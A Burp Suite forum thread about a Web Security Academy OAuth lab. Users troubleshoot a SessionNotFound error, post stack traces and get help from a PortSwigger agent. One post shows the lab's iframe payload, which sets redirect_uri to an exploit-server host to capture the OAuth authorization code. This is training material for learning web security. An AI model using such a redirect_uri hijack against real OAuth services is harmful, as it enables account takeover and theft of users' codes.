Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: OAuth account hijacking via redirect_uri: SessionNotFound

Antonin | Last updated: Jul 23, 2024 04:07AM UTC

Hi, In the lab titled "Lab: OAuth account hijacking via redirect_uri", I am unable to view the exploit when using the iframe payload on the exploit server. Instead, I get the error below inside the iframe: ```bash OAuth account hijacking via redirect_uri Back to lab description SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) ``` I tried yesterday, and today again. The lab had time to reset in-between. Yet, the error is the same. I am following the instructions in the solution religiously. What am I doing wrong?

Ben, PortSwigger Agent | Last updated: Jul 23, 2024 08:40AM UTC

Hi Antonin, Just to clarify, which browser are you using when you attempt this lab?

Antonin | Last updated: Jul 25, 2024 07:40AM UTC

Hi Ben, I am using the native Chromium browser packed with Burp, always.

Antonin | Last updated: Jul 25, 2024 07:56AM UTC

Below is the payload for /exploit: ```html <iframe src="https://oauth-0a1300f604b...028f00b9.oauth-server.net/auth?client_id=kfnckzp146a10r6ofmdvj&redirect_uri=https://exploit-0a7a00c4...f64ca01e700ba.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"></iframe> ``` Below is a screenshot of the iframe: https://snipboard.io/wDePNO.jpg

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:06AM UTC

Hi Antonin, If you use a standard version of Chrome, do you still see this behaviour?

Jack | Last updated: Jul 27, 2024 09:48PM UTC

same error with chrome, opera, burp browser and firefox, newest version everywhere. Can you please go deeper and try to fix the issue even without replicating? I am afraid that if you wait for you to be able to replicate it will never be fixed because usually u cant replicate :( But some steps could be made to prevent this even if you cant replicate please.

Jack | Last updated: Jul 27, 2024 09:49PM UTC

SessionNotFound: invalid_request at Provider.getInteraction (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:50:11) at Provider.interactionDetails (/opt/node-v19.8.1-linux-x64/lib/node_modules/oidc-provider/lib/provider.js:228:27) at /home/carlos/oauth/index.js:160:34 at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at setNoCache (/home/carlos/oauth/index.js:121:5) at Layer.handle [as handle_request] (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/layer.js:95:5) at next (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:137:13) at Route.dispatch (/opt/node-v19.8.1-linux-x64/lib/node_modules/express/lib/router/route.js:112:3) at Layer.handle [as handle_request]

Jack | Last updated: Jul 27, 2024 09:52PM UTC

eventually I quitted burp browser and opened the exploit server again and delivered and worked. very strange bug

2lfa | Last updated: Jul 28, 2024 12:06PM UTC

The issue can be fixed by a temporary fix, you can find the solution here: https://forum.portswigger.net/thread/oauth-account-hijacking-via-redirect-uri-works-with-chrome-but-not-using-burp-s-chromium-b5f18f8a

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.